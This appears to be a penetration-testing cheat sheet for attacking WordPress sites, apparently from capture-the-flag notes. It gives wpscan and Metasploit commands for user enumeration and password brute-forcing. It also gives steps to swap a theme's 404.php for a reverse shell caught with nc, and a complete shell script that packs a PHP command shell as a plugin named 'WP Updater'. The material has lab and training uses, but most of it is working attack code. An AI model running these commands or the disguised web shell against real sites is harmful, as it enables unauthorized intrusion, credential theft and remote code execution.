WordPress
- Brute-force the login pages: http://$IP/wp-admin , http://$IP/wp-login.php
```bash
# Extract users, version, plugins and themes
wpscan --url http://$IP --enumerate
# Brute-force creds (e.g. user: admin); keep threads low to limit lockouts and noise
wpscan --url http://$IP --wordlist rockyou.txt --username $USERS --max-threads 3
# Ignore the TLS certificate error (self-signed cert)
wpscan --url https://$IP --disable-tls-checks
```
(`--wordlist` / `--username` are the old WPScan option names; WPScan 3.x calls them `--passwords` / `--usernames`.)
- Metasploit brute-force:
```
msf > use auxiliary/scanner/http/wordpress_login_enum
```
- Check for directory listing on http://$IP/wp-content/themes and http://$IP/wp-content/uploads (reveals installed themes and user-uploaded files)
- Possible attack vectors:
- After logging in as an admin, replace the 404.php of a theme (e.g. wp-content/themes/twentynineteen/404.php) with a PHP reverse shell, then request that file directly; Metasploit automates the same idea:
```
msf > use exploit/unix/webapp/wp_admin_shell_upload
```
- Upload a malicious plugin as a zip (Plugins > Add New > Upload Plugin); the PHP inside is reachable under wp-content/plugins/<slug>/ even without activating it
- Check interesting files: /var/www/wp-config.php (DB credentials and salts; lives in the WordPress root, often /var/www/html/wp-config.php)
- Check plugins' vulnerabilities
- WordPress Plugin User Role Editor (https://www.exploit-db.com/exploits/44595): THM-Jack
- Uploaded media lands at <base URL>/wp-content/uploads/<yyyy>/<mm>/<file name>
e.g.
```bash
# vt = vulnerable themes, tt = timthumbs, u = users, ap = all plugins
wpscan --url <url> -e vt,tt,u,ap -o wpscan.log
wpscan --url <url> --wordlist <wordlist> --username <username>
```
Navigate to:
Appearance (left-hand side) > Editor (left-hand side; "Theme File Editor" in newer versions) > 404 Template (right-hand side)
Replace the PHP there with malicious shell-spawning PHP (e.g. the pentestmonkey php reverse shell script with $ip and $port set to your listener) and click Update File; keep a copy of the original 404.php to restore afterwards.
Start a listener (e.g. nc -lvnp <port>), then browse to http://<site_name>/wp-content/themes/<theme_name>/404.php to trigger the payload.
Caveat: the editor is absent when wp-config.php sets DISALLOW_FILE_EDIT; in that case fall back to the plugin-upload vector.
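The "malicious plugin in zip" vector above needs a zip that WordPress will accept as a plugin. The following script is an added example, not code from the original page: it writes a minimal plugin whose main file is a command shell and packs it for Plugins > Add New > Upload Plugin. The slug `wp-updater`, the `cmd` parameter and the output path are arbitrary choices made here.

```sh
#!/bin/sh
# Added example: build a minimal WordPress plugin zip whose main file is a
# PHP command shell. Slug "wp-updater" and parameter "cmd" are assumptions.

build_plugin_zip() {
    # $1 = output directory, $2 = plugin slug (directory and main file name)
    outdir="$1"
    slug="${2:-wp-updater}"
    mkdir -p "$outdir/$slug"

    # WordPress recognises a file as a plugin only if it carries the
    # "Plugin Name:" header. After upload the file is served directly, no
    # activation needed:  http://$IP/wp-content/plugins/<slug>/<slug>.php?cmd=id
    cat > "$outdir/$slug/$slug.php" <<'EOF'
<?php
/*
Plugin Name: WP Updater
Description: Minimal command shell packaged as a plugin
Version: 1.0
*/
if (isset($_GET['cmd'])) {
    header('Content-Type: text/plain');
    system($_GET['cmd']);
}
EOF

    # The uploader only accepts .zip; use Python's zipfile CLI if zip is missing.
    if command -v zip >/dev/null 2>&1; then
        (cd "$outdir" && zip -qr "$slug.zip" "$slug")
    else
        (cd "$outdir" && python3 -m zipfile -c "$slug.zip" "$slug")
    fi
    printf '%s\n' "$outdir/$slug.zip"
}

# Usage: sh build_plugin_zip.sh <outdir> [slug]
if [ $# -ge 1 ]; then
    build_plugin_zip "$1" "$2"
fi
```

Swap the `system()` stub for the pentestmonkey reverse shell if you prefer a callback over a web shell; the plugin header is what matters for the upload to succeed.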